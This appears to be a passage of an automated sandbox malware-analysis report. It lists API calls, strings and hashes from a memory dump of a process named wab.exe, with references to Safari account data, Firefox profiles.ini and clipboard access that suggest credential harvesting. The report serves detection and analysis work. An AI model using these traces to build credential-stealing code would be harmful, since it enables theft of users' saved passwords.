                                                                                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                                                                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                      • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2565263379-0
                                                                                                                                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                      • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                                                      • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2014503067-0
                                                                                                                                                                                                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7600DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                      • API String ID: 403622227-2664311388
                                                                                                                                                                                                                      • Opcode ID: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                      • API String ID: 577499730-1134094380
                                                                                                                                                                                                                      • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                                                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
